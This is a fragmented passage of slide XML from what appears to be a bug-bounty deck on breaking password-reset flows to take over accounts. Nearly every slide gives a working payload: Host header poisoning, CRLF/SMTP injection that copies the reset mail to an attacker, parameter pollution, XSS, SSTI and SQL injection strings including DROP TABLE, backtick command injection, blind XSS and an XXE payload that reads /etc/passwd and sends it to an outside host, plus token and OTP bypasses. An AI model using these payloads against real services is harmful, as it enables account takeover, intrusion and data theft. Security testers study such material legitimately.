              <a:t> Host Header e.g. Host: me.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To 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Host: 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3" name="Google Shape;213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5" name="Google Shape;2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9" name="Google Shape;21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1" name="Google Shape;221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1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Sign Up With Email me@gmail.com.id.burpcollaborator.net </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Then</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> R</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eset Your Password For Email me@gmáil.com.id.burpcollaborator.net</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To 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63" name="Google Shape;463;p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me@gmáil.com.id.burpcollaborator.net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64" name="Google Shape;464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5" name="Google Shape;465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67" name="Google Shape;4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9" name="Google Shape;46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>
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sign Up With Email me@id.burpcollaborator.net </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Then</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Reset Your Password For Email me@id.burpcollaborator.net</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Get Internal Headers OR Internal IPs Then Use This Internal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Headers AND Internal IPs</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To PWN The Company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75" name="Google Shape;475;p6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me@id.burpcollaborator.net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76" name="Google Shape;476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7" name="Google Shape;477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79" name="Google Shape;47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1" name="Google Shape;48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CRLF and SMTP Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> e.g. victim@gmail.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%0a%0d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cc:attacker@gmail.com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Receive The</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Reset</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Token In Your Mail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87" name="Google Shape;487;p6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victim@gmail.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%0a%0dcc:me@gmail.com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88" name="Google Shape;488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9" name="Google Shape;489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91" name="Google Shape;4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93" name="Google Shape;49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95" name="Google Shape;495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97" name="Google Shape;497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Parameter Pollution Technique </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e.g. victim@gmial.com&amp;email=me@gmail.com </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Receive The Reset Token In Your Mail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03" name="Google Shape;503;p6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victim@gmail.com&amp;email=me@gmail.com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04" name="Google Shape;504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5" name="Google Shape;505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07" name="Google Shape;50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09" name="Google Shape;50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1" name="Google Shape;511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Change </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Content Type Header To application/json </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AND</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Insert Value Of Email As Array e.g </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{"email":["victim@gmail.com","me@gmail.com"]}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Receive The </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reset </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Token In Your Mail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17" name="Google Shape;517;p6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Content-Type: application/json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{"email":["victim@gmail.com","me@gmail.com"]}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18" name="Google Shape;518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9" name="Google Shape;519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21" name="Google Shape;52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3" name="Google Shape;52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5" name="Google Shape;525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3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7" name="Google Shape;527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3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1" name="Google Shape;531;p6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4025" y="433745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Separators</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> e.g. |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%20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, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Receive The Reset Token In Your Mail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37" name="Google Shape;537;p6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victim@gmail.com,me@gmail.com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38" name="Google Shape;538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9" name="Google Shape;539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41" name="Google Shape;5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3" name="Google Shape;54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5" name="Google Shape;54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Register The Same Email With Different TLD e.g .eu , .net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Then</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Reset Password </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get ATO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51" name="Google Shape;551;p6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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>net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52" name="Google Shape;552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3" name="Google Shape;553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55" name="Google Shape;55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7" name="Google Shape;55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Use Your Email Without Mail Address e.g. me </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Instead Of</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> me@gmail.com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Cause Error </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exposing</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Reset Token In The Response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63" name="Google Shape;563;p6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me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64" name="Google Shape;564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5" name="Google Shape;565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67" name="Google Shape;5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69" name="Google Shape;569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5" name="Google Shape;575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77" name="Google Shape;577;p6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Sometimes They Ping Your Host Before Sending A Mail So Try To Reset Password By Using </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Burp Collaborator Mail Address with Injection OS Command </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get RCE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78" name="Google Shape;5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me@`whoami`.id.collaborator.net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80" name="Google Shape;580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81" name="Google Shape;58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7" name="Google Shape;587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89" name="Google Shape;589;p6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Reset Your Password By Using </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This List Of Payloads As Email Addresses </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get XSS , SSTI , SQLi OR Abusing Of Database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0" name="Google Shape;59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me+(&lt;script&gt;alert(0)&lt;/script&gt;)@gmail.com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me(&lt;script&gt;alert(0)&lt;/script&gt;)@gmail.com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me@gmail(&lt;script&gt;alert(0)&lt;/script&gt;).com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"&lt;script&gt;alert(0)&lt;/script&gt;"@gmail.com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"&lt;%= 7 * 7 %&gt;"@gmail.com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me+(${{7*7}})@gmail.com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"' OR 1=1 -- '"@gmail.com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"me); DROP TABLE users;--"@gmail.com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me@[</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1250">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.collaborator.net]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%@gmail.com</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1250">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="592" name="Google Shape;592;p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3" name="Google Shape;59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5" name="Google Shape;595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68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7" name="Google Shape;597;p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946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68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9" name="Google Shape;59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5074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8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1" name="Google Shape;601;p6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43394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Override The</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Host Header e.g. POST https://company.com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Change Host Header e.g Host: me.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To 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29" name="Google Shape;229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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://company.com/resetPassword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Host: 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050" y="39341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8" name="Google Shape;238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2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025" y="43268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EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Email Parameter In GET Request</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> With XSS Payloads e.g.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill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email=me@gmail.com"&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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07" name="Google Shape;607;p6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/resetPassword?</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>email=me@gmail.com"&gt;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&lt;script&gt;alert(document.domain)&lt;/script&gt;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08" name="Google Shape;608;p6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9" name="Google Shape;609;p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11" name="Google Shape;61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3" name="Google Shape;61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Email Parameter In GET Request With Time-Based SQLi Payloads e.g.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  email=me@gmail.com'</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%2b(select*from(select(sleep(20)))a)%2b'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SQLi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19" name="Google Shape;619;p7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/resetPassword?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	</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>email=me@gmail.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'%2b(select*from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	(select(sleep(20)))a)%2b'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20" name="Google Shape;620;p7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1" name="Google Shape;621;p7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7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23" name="Google Shape;62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25" name="Google Shape;625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1" name="Google Shape;631;p7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33" name="Google Shape;633;p7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Blind XSS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e.g.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"&gt;&lt;script src=//me.xss.ht&gt;&lt;/script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OR </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQLi Payloads e.g. ' AND '1' = '2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";WAITFOR DELAY '0.0.20'-- </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In User-Agent Header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4" name="Google Shape;63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resetPassword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 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;&lt;script src=//me.xss.ht&gt;&lt;/script&gt;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36" name="Google Shape;636;p7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7" name="Google Shape;637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Append </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JSON Extension To The Endpoint</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> e.g. resetPassword.json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Get The Reset Token In The Response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43" name="Google Shape;643;p7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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.json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victim@gmail.com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44" name="Google Shape;644;p7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5" name="Google Shape;645;p7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47" name="Google Shape;64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49" name="Google Shape;64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7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51" name="Google Shape;651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CRLF and Host Header Injection e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?0a%0dHost:me.com </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AND You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Can Use Others Headers</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> e.g. X-Host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True-Client-IP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X-Forwarded-Host etc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57" name="Google Shape;657;p7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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?0a%0dHost:me.com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victim@gmail.com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58" name="Google Shape;658;p7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9" name="Google Shape;659;p7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61" name="Google Shape;66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63" name="Google Shape;663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7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65" name="Google Shape;66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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hange Request Method e.g. GET , PUT , POST etc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Content Type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Header To xml OR json</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Cause Error Exposing Reset Token In The Response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71" name="Google Shape;671;p7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PUT</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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Content-Type: application/json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victim@gmail.com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72" name="Google Shape;672;p7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3" name="Google Shape;673;p7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75" name="Google Shape;67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7" name="Google Shape;677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Parameter Reflected In </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Received</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Message</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Try To Inject Payload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Like This </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e.g. &lt;img src=\"http://me.com/?id=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steal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83" name="Google Shape;683;p7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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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email=victim@gmail.com&amp;parameter=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;img src=\"http://me.com/?id=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84" name="Google Shape;684;p7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5" name="Google Shape;685;p7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7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87" name="Google Shape;68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7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89" name="Google Shape;689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5" name="Google Shape;695;p7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97" name="Google Shape;697;p7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Enter Correct Email AND Try To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Read</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> The Response , Sometimes The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Token OR Personal Information e.g. Email Will Leak In The Response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98" name="Google Shape;69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7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HTTP/1.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>200 OK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Access-Control-Allow-Credentials: true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application/json; charset=utf-8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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>length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"email" : "</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>victim@gmail.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" ,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"token" : </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>******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00" name="Google Shape;700;p7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01" name="Google Shape;701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7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03" name="Google Shape;703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76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05" name="Google Shape;705;p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7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6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3" name="Google Shape;713;p7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15" name="Google Shape;715;p7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Enter Correct Email AND Wrong OTP Code Then Try To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Manipulate The Response To Change The Response To Response Of The Correct OTP Code </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get ATO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6" name="Google Shape;71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7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HTTP/1.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>200 OK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Access-Control-Allow-Credentials: true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application/json; charset=utf-8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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>length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"email" : "</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>victim</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@gmail.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" ,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"code" : </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>******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18" name="Google Shape;718;p7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9" name="Google Shape;719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7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21" name="Google Shape;72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50" y="39341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7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24" name="Google Shape;724;p77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25" name="Google Shape;725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1" name="Google Shape;731;p7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33" name="Google Shape;733;p7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>
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Change The Request To XML Body With XXE Payloads </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e.g. &lt;!ENTITY % asd SYSTEM "http://me.com/XXE.dtd"&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AND</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> XXE.dtd Contains &lt;!ENTITY % d SYSTEM "file:///etc/passwd"&gt;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&lt;!ENTITY % c SYSTEM '&lt;!ENTITY % rrr SYSTEM "http://me.com/%d;'&gt;"&gt;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734" name="Google Shape;73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/resetPassword/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>change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&lt;?xml version="1.0" encoding="ISO-8859-1"?&gt;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&lt;!DOCTYPE a [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&lt;!ENTITY % asd SYSTEM "http://me.com/XXE.dld"&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="12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%asd;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%c;]&gt;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&lt;root&gt;%rrr;&lt;old&gt;*****&lt;/old&gt;&lt;new&gt;*****&lt;/new&gt;&lt;/root&gt;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736" name="Google Shape;736;p7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37" name="Google Shape;737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Ambiguate</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> The Host Header e.g. Host: company.com@me.com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49" name="Google Shape;249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Host: company.com@me.com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50" name="Google Shape;250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Check </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If The Reset Token Expired OR Not After The Using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NOT , There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Is Issue Here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43" name="Google Shape;743;p7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/resetPassword/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>change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 sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>me</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@gmail.c</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>om&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>token=Random</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;old-pass=**********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&amp;new-pass=*********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44" name="Google Shape;744;p7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5" name="Google Shape;745;p7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47" name="Google Shape;74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7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49" name="Google Shape;749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51" name="Google Shape;751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79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53" name="Google Shape;753;p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Remove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The Reset Token </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get ATO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59" name="Google Shape;759;p8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/resetPassword/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>change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email=me@gmail.com&amp;new-pass=******&amp;confirm-new-pass=*******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60" name="Google Shape;760;p8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1" name="Google Shape;761;p8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8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63" name="Google Shape;76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8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65" name="Google Shape;76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8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67" name="Google Shape;767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80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69" name="Google Shape;769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80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71" name="Google Shape;771;p8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3939538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The Reset Token To null</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> OR If </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>There Is OTP Insert Zeros e.g. 0000</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> as Value AND Try To Inject an Array e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>token=[] </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get ATO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77" name="Google Shape;777;p8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/resetPassword/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>change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email=me@gmail.com&amp;token=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
